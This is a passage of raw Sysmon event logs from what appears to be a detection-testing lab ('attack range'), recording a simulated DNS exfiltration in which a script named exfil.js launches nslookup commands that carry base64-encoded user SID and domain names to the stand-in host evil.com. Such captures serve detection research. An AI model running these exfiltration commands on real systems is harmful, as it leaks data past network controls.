14:21:51.301{2E1864BB-18E0-629A-6742-000000005F02}39766672C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-5A46-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.301{2E1864BB-18FF-629A-5A46-000000005F02}7288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqinzb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.284{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxeg.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.268{2E1864BB-18FF-629A-5846-000000005F02}57201696C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5946-000000005F02}5088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.252{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.252{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.252{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.252{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.252{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5946-000000005F02}5088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.252{2E1864BB-18FF-629A-5746-000000005F02}48162800C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-5946-000000005F02}5088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.264{2E1864BB-18FF-629A-5946-000000005F02}5088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-5746-000000005F02}4816C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxeg.tmp 2>&1 354300x8000000000000000215653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.771{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51315- 354300x8000000000000000215652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.770{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51314- 354300x8000000000000000215651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.770{00000000-0000-0000-0000-000000000000}2560<unknown process>-udptruefalse127.0.0.1-51314-false127.0.0.1-53domain 354300x8000000000000000215650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.694{00000000-0000-0000-0000-000000000000}3292<unknown process>-udpfalsefalse127.0.0.1-51313-false127.0.0.1-53domain 354300x8000000000000000215649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51313- 354300x8000000000000000215648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51312- 354300x8000000000000000215647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.693{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51311- 354300x8000000000000000215646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{00000000-0000-0000-0000-000000000000}6496<unknown process>-udpfalsefalse127.0.0.1-51310-false127.0.0.1-53domain 354300x8000000000000000215645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51310- 354300x8000000000000000215644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{00000000-0000-0000-0000-000000000000}6496<unknown process>-udptruefalse127.0.0.1-51310-false127.0.0.1-53domain 354300x8000000000000000215643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{00000000-0000-0000-0000-000000000000}6496<unknown process>-udpfalsefalse127.0.0.1-51309-false127.0.0.1-53domain 354300x8000000000000000215642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51309- 354300x8000000000000000215641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{00000000-0000-0000-0000-000000000000}6496<unknown process>-udptruefalse127.0.0.1-51309-false127.0.0.1-53domain 354300x8000000000000000215640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{00000000-0000-0000-0000-000000000000}6496<unknown process>-udpfalsefalse127.0.0.1-51308-false127.0.0.1-53domain 354300x8000000000000000215639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.605{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51308- 354300x8000000000000000215638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.604{00000000-0000-0000-0000-000000000000}6496<unknown process>-udptruefalse127.0.0.1-51308-false127.0.0.1-53domain 354300x8000000000000000215637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{00000000-0000-0000-0000-000000000000}4672<unknown process>-udpfalsefalse127.0.0.1-51307-false127.0.0.1-53domain 354300x8000000000000000215636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51307- 354300x8000000000000000215635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-51307-false127.0.0.1-53domain 354300x8000000000000000215634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{00000000-0000-0000-0000-000000000000}4672<unknown process>-udpfalsefalse127.0.0.1-51306-false127.0.0.1-53domain 354300x8000000000000000215633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51306- 354300x8000000000000000215632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51305- 354300x8000000000000000215631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.537{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-51305-false127.0.0.1-53domain 354300x8000000000000000215630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.456{00000000-0000-0000-0000-000000000000}6092<unknown process>-udpfalsefalse127.0.0.1-51304-false127.0.0.1-53domain 354300x8000000000000000215629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.456{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51304- 354300x8000000000000000215628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.456{00000000-0000-0000-0000-000000000000}6092<unknown process>-udptruefalse127.0.0.1-51304-false127.0.0.1-53domain 354300x8000000000000000215627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.456{00000000-0000-0000-0000-000000000000}6092<unknown process>-udpfalsefalse127.0.0.1-51303-false127.0.0.1-53domain 354300x8000000000000000215626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.456{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51303- 354300x8000000000000000215625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.456{00000000-0000-0000-0000-000000000000}6092<unknown process>-udptruefalse127.0.0.1-51303-false127.0.0.1-53domain 354300x8000000000000000215624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.455{00000000-0000-0000-0000-000000000000}6092<unknown process>-udpfalsefalse127.0.0.1-51302-false127.0.0.1-53domain 354300x8000000000000000215623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.455{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51302- 354300x8000000000000000215622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.455{00000000-0000-0000-0000-000000000000}6092<unknown process>-udptruefalse127.0.0.1-51302-false127.0.0.1-53domain 10341000x8000000000000000215621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.237{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5846-000000005F02}5720C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.237{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5846-000000005F02}5720C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.353{00000000-0000-0000-0000-000000000000}6028<unknown process>-udpfalsefalse127.0.0.1-51301-false127.0.0.1-53domain 354300x8000000000000000215618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.353{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51301- 354300x8000000000000000215617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.353{00000000-0000-0000-0000-000000000000}6028<unknown process>-udptruefalse127.0.0.1-51301-false127.0.0.1-53domain 354300x8000000000000000215616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.353{00000000-0000-0000-0000-000000000000}6028<unknown process>-udpfalsefalse127.0.0.1-51300-false127.0.0.1-53domain 354300x8000000000000000215615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.352{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51300- 354300x8000000000000000215614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.352{00000000-0000-0000-0000-000000000000}6028<unknown process>-udptruefalse127.0.0.1-51300-false127.0.0.1-53domain 354300x8000000000000000215613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.349{00000000-0000-0000-0000-000000000000}6028<unknown process>-udpfalsefalse127.0.0.1-51299-false127.0.0.1-53domain 354300x8000000000000000215612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.349{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51299- 354300x8000000000000000215611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.349{00000000-0000-0000-0000-000000000000}6028<unknown process>-udptruefalse127.0.0.1-51299-false127.0.0.1-53domain 354300x8000000000000000215610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.261{00000000-0000-0000-0000-000000000000}1692<unknown process>-udpfalsefalse127.0.0.1-51298-false127.0.0.1-53domain 354300x8000000000000000215609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.261{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51298- 354300x8000000000000000215608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.261{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-51298-false127.0.0.1-53domain 354300x8000000000000000215607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.259{00000000-0000-0000-0000-000000000000}1692<unknown process>-udpfalsefalse127.0.0.1-51297-false127.0.0.1-53domain 354300x8000000000000000215606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51297- 354300x8000000000000000215605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.259{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-51297-false127.0.0.1-53domain 354300x8000000000000000215604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.258{00000000-0000-0000-0000-000000000000}1692<unknown process>-udpfalsefalse127.0.0.1-51296-false127.0.0.1-53domain 354300x8000000000000000215603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.258{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51296- 354300x8000000000000000215602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.194{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-51295-false127.0.0.1-53domain 354300x8000000000000000215601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.194{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51295- 354300x8000000000000000215600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.193{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-51295-false127.0.0.1-53domain 354300x8000000000000000215599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.193{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-51294-false127.0.0.1-53domain 354300x8000000000000000215598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.193{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51294- 354300x8000000000000000215597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.193{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-51294-false127.0.0.1-53domain 354300x8000000000000000215596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.192{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-51293-false127.0.0.1-53domain 10341000x8000000000000000215595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.221{2E1864BB-18FF-629A-5846-000000005F02}57201696C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5746-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{00000000-0000-0000-0000-000000000000}984<unknown process>-udpfalsefalse127.0.0.1-51279-false127.0.0.1-53domain 354300x8000000000000000215593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{00000000-0000-0000-0000-000000000000}984<unknown process>-udptruefalse127.0.0.1-51278-false127.0.0.1-53domain 354300x8000000000000000215592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.740{00000000-0000-0000-0000-000000000000}984<unknown process>-udptruefalse127.0.0.1-51277-false127.0.0.1-53domain 354300x8000000000000000215591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{00000000-0000-0000-0000-000000000000}1372<unknown process>-udptruefalse127.0.0.1-51272-false127.0.0.1-53domain 354300x8000000000000000215590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{00000000-0000-0000-0000-000000000000}1372<unknown process>-udpfalsefalse127.0.0.1-51271-false127.0.0.1-53domain 354300x8000000000000000215589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{00000000-0000-0000-0000-000000000000}1372<unknown 